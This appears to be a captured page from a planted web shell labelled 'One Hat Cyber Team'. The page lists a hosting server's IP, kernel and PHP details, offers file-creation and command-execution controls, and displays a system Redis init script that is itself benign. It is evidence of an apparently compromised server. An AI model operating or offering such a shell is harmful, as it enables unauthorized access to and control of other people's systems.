One Hat Cyber Team
Your IP :
216.73.217.176
Server IP :
185.33.55.30
Server :
Linux cl30.webspacecontrol.com 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64
Server Software :
Apache
PHP Version :
8.3.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
etc
/
rc.d
/
init.d
/
View File Name :
redis-peruser
#!/bin/sh # # redis init file for starting up the redis daemon # # chkconfig: - 20 80 # description: Starts and stops the redis daemon. # Source function library. . /etc/rc.d/init.d/functions PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" name="redis-server" exec="$(which $name)" pidfile="/var/run/redis/redis.pid" passwordfile="/var/run/redis/redis.pwd" REDIS_CONFIG="/etc/redis-peruser.conf" generatepasswd() { local pass1=$(dd if=/dev/urandom bs=200 count=1 2>/dev/null | md5sum | cut -d' ' -f1) local pass2=$(dd if=/dev/urandom bs=200 count=1 2>/dev/null | md5sum | cut -d' ' -f1) echo "requirepass ${pass1}${pass2}" >${passwordfile} chmod 700 ${passwordfile} } [ -e /etc/sysconfig/redis-peruser ] && . /etc/sysconfig/redis-peruser [ -e ${passwordfile} ] || generatepasswd lockfile=/var/lock/subsys/redis start() { [ -f $REDIS_CONFIG ] || exit 6 [ -x $exec ] || exit 5 echo -n $"Starting $name: " daemon "$exec $REDIS_CONFIG" retval=$? echo [ $retval -eq 0 ] && touch $lockfile return $retval } stop() { echo -n $"Stopping $name: " killproc -p $pidfile $name retval=$? echo [ $retval -eq 0 ] && rm -f $lockfile return $retval } restart() { stop start } reload() { false } rh_status() { status -p $pidfile $name } rh_status_q() { rh_status >/dev/null 2>&1 } status_cf() { [ ${passwordfile} -nt ${pidfile} ] } case "$1" in start) rh_status_q && exit 0 $1 ;; stop) rh_status_q || exit 0 $1 ;; restart) $1 ;; reload) rh_status_q || exit 7 $1 ;; check) status_cf && restart 2>/dev/null rh_status_q 2>/dev/null || restart 2>/dev/null ;; force-reload) force_reload ;; status) rh_status ;; condrestart|try-restart) rh_status_q || exit 0 restart ;; *) echo $"Usage: $0 {start|stop|status|restart|condrestart|try-restart}" exit 2 esac exit $?